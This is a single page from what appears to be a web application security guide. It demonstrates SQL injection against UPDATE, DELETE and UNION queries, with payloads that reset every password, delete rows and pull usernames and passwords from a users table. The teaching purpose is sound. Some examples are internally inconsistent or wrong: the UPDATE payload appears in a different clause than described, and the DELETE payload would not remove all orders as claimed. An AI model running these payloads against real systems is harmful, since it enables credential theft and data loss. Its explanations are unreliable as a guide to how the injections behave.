Web application security - the fast guide 1.1 | Page 124

Chapter 6 - Attack execution (2)
P a g e | 124
UPDATE users SET password=’theNewPass’ WHERE user = ‘sami’ and
password
= ‘oldPassword’
Attack
If the new password value is set to ( admin’ or 1=1-- ) the resulting
query will become
UPDATE users SET password=’theNewPass’ WHERE user = ‘admin’ or
1=1
6.9.4 Attacking Delete statement
Using a method similar to the one used with update statement attacker can cause
a great damage injecting into delete statement
The following listing is dedicated to remove an order item from an order
Listing
DELETE FROM orders WHERE order_item_code=’p23453’ and
order_Id=12
Attack:
Setting order_item_code value to( ‘ or 1=1 )will cause the deletion of all
orders in orders table.
DELETE FROM orders WHERE order_item_code=’’ or 1=1 and
order_Id=12
6.9.5 Attacking Using UNION
Using union can open the door widely open to execute a separated select query. a
simple query like the one shown in the following listing can be exploited to
retrieve user names and passwords for all users.
Listing
Select * from titles where username=’sami’
Attack:
Setting the username value to ( sami’ UNION SELECT uid,username,password
FROM users-- )
Select * from titles where username=’sami’ UNION SELECT
uid,username,password FROM users--